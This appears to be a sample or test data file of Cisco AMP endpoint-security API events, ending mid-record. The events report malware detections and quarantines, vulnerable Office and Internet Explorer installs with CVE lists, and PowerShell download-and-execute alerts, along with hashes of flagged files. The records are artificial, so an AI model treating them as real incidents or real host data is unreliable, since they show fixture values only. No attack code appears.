-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet 